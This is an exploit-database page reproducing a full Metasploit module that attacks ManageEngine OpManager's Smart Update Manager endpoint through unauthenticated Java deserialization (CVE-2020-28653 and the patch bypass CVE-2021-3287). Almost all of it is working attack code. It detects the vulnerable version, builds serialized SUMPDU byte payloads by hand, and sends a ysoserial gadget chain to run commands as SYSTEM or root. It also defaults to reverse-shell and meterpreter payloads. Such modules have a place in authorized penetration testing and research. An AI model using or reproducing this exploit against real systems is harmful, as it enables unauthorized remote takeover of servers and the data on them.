Exploit for ManageEngine OpManager SumPDU Java Deserialization CVE-2020-28653 CVE-2021-3287

Name: Exploit for ManageEngine OpManager SumPDU Java Deserialization CVE-2020-28653 CVE-2021-3287
Rating: 5 (163 reviews)
2021-09-21 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:164231
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Powershell  
include Rex::Java  
  
JAVA_SERIALIZED_STRING = [ Serialization::TC_STRING, 0 ].pack('Cn')  
JAVA_SERIALIZED_STRING_ARRAY = "\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"\  
"\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x00".b  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',  
'Description' => %q{  
An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to  
deserialize an arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS  
commands in the context of the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This  
vulnerability is also present in other products that are built on top of the OpManager application. This  
vulnerability affects OpManager versions 12.1 - 12.5.328.  
  
Automatic CVE selection only works for newer targets when the build number is present in the logon page. Due  
to issues with the serialized payload this module is incompatible with versions prior to 12.3.238 despite them  
technically being vulnerable.  
},  
'Author' => [  
'Johannes Moritz', # Original Vulnerability Research  
'Robin Peraglie', # Original Vulnerability Research  
'Spencer McIntyre' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],  
'Platform' => [ 'win', 'linux', 'python', 'unix' ],  
'References' => [  
[ 'CVE', '2020-28653' ], # original CVE  
[ 'CVE', '2021-3287' ], # patch bypass  
[ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]  
],  
'Privileged' => true,  
'Targets' => [  
[  
'Windows Command',  
{  
'Arch' => ARCH_CMD,  
'Platform' => 'win',  
'Type' => :win_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'  
}  
}  
],  
[  
'Windows Dropper',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'Platform' => 'win',  
'Type' => :win_dropper,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Windows PowerShell',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'Platform' => 'win',  
'Type' => :win_psh,  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Unix Command',  
{  
'Arch' => ARCH_CMD,  
'Platform' => 'unix',  
'Type' => :nix_cmd  
}  
],  
[  
'Linux Dropper',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'Platform' => 'linux',  
'Type' => :nix_dropper,  
'DefaultOptions' => {  
'CMDSTAGER::FLAVOR' => 'wget',  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Python',  
{  
'Arch' => ARCH_PYTHON,  
'Platform' => 'python',  
'Type' => :python,  
'DefaultOptions' => {  
'PAYLOAD' => 'python/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultOptions' => {  
'RPORT' => 8060  
},  
'DefaultTarget' => 0,  
'DisclosureDate' => '2021-07-26',  
'Notes' => {  
'Reliability' => [ REPEATABLE_SESSION ],  
'SideEffects' => [ ARTIFACTS_ON_DISK ],  
'Stability' => [ CRASH_SAFE ]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [ true, 'OpManager path', '/']),  
OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ])  
])  
end  
  
def check  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),  
'data' => build_java_serialized_int(1002)  
})  
return Exploit::CheckCode::Unknown unless res  
# the patched version will respond back with 200 OK and no data in the response body  
return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?("\xac\xed\x00\x05".b)  
  
Exploit::CheckCode::Detected  
end  
  
def exploit  
# Step 1: Establish a valid HTTP session  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path),  
'keep_cookies' => true  
})  
unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/  
fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')  
end  
print_status('An HTTP session cookie has been issued')  
if (@vulnerability = datastore['CVE']) == 'Automatic'  
# if selecting the vulnerability automatically, use version detection  
if (version = res.body[%r{(?<=cachestart/)(\d{6})(?=/cacheend)}]&.to_i).nil?  
fail_with(Failure::UnexpectedReply, 'Could not identify the remote version number')  
end  
  
version = Rex::Version.new("#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}")  
print_status("Detected version: #{version}")  
if version < Rex::Version.new('12.1')  
fail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability')  
elsif version < Rex::Version.new('12.5.233')  
@vulnerability = 'CVE-2020-28653'  
elsif version < Rex::Version.new('12.5.329')  
@vulnerability = 'CVE-2021-3287'  
else  
fail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability')  
end  
end  
  
# Step 2: Add the requestHandler to the HTTP session  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),  
'keep_cookies' => true,  
'data' => build_java_serialized_int(1002)  
})  
unless res&.code == 200  
fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')  
end  
print_status('The request handler has been associated with the HTTP session')  
  
if @vulnerability == 'CVE-2021-3287'  
# need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is  
# initialized and made ready to process subsequent requests  
send_sumpdu(build_sumpdu(data: build_java_serialized_int(0)))  
end  
  
# Step 3: Exploit the deserialization vulnerability to run commands  
case target['Type']  
when :nix_dropper  
execute_cmdstager  
when :win_dropper  
execute_cmdstager  
when :win_psh  
execute_command(cmd_psh_payload(  
payload.encoded,  
payload.arch.first,  
remove_comspec: true  
))  
else  
execute_command(payload.encoded)  
end  
end  
  
def build_java_serialized_int(int)  
stream = Serialization::Model::Stream.new  
stream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N'))  
stream.encode  
end  
  
def build_sumpdu(data: '')  
# build a serialized SUMPDU object with a custom data block  
sumpdu = "\xac\xed\x00\x05\x73\x72\x00\x27\x63\x6f\x6d\x2e\x61\x64\x76\x65".b  
sumpdu << "\x6e\x74\x6e\x65\x74\x2e\x74\x6f\x6f\x6c\x73\x2e\x73\x75\x6d\x2e".b  
sumpdu << "\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x2e\x53\x55\x4d\x50\x44\x55\x24".b  
sumpdu << "\x29\xfc\x8a\x86\x1b\xfd\xed\x03\x00\x03\x5b\x00\x04\x64\x61\x74".b  
sumpdu << "\x61\x74\x00\x02\x5b\x42\x4c\x00\x02\x69\x64\x74\x00\x12\x4c\x6a".b  
sumpdu << "\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b".b  
sumpdu << "\x4c\x00\x08\x75\x6e\x69\x71\x75\x65\x49\x44\x71\x00\x7e\x00\x02".b  
sumpdu << "\x78\x70\x7a" + [ 0x14 + data.length ].pack('N')  
sumpdu << "\x00\x0c\x4f\x50\x45\x4e\x5f\x53\x45\x53\x53\x49\x4f\x4e\x00\x00".b  
sumpdu << "\x00\x00"  
sumpdu << [ data.length ].pack('n') + data  
sumpdu << "\x78".b  
sumpdu  
end  
  
def send_sumpdu(sumpdu)  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'),  
'keep_cookies' => true,  
'data' => [ sumpdu.length ].pack('N') + sumpdu  
})  
res  
end  
  
def execute_command(cmd, _opts = {})  
# An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain  
# will execute it.  
case target['Platform']  
when 'python'  
cmd.prepend('python -c ')  
when 'win'  
cmd.prepend('cmd.exe /c ')  
else  
cmd.gsub!(/\s+/, '${IFS}')  
cmd.prepend('sh -c ')  
end  
  
vprint_status("Executing command: #{cmd}")  
# the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the  
# dependency on the commons-collections library making it usable in this context  
java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)  
  
if @vulnerability == 'CVE-2020-28653'  
# in this version, the SUM PDU that is deserialized is the malicious object  
sum_pdu = java_payload  
elsif @vulnerability == 'CVE-2021-3287'  
# the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows  
# arbitrary objects to be deserialized by first sending an object of the expected type  
pdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path  
pdu_data << JAVA_SERIALIZED_STRING  
pdu_data << JAVA_SERIALIZED_STRING  
pdu_data << JAVA_SERIALIZED_STRING  
pdu_data << JAVA_SERIALIZED_STRING_ARRAY  
pdu_data << Serialization::TC_RESET  
pdu_data << java_payload.delete_prefix("\xac\xed\x00\x05".b)  
sum_pdu = build_sumpdu(data: pdu_data)  
end  
  
res = send_sumpdu(sum_pdu)  
fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200  
end  
end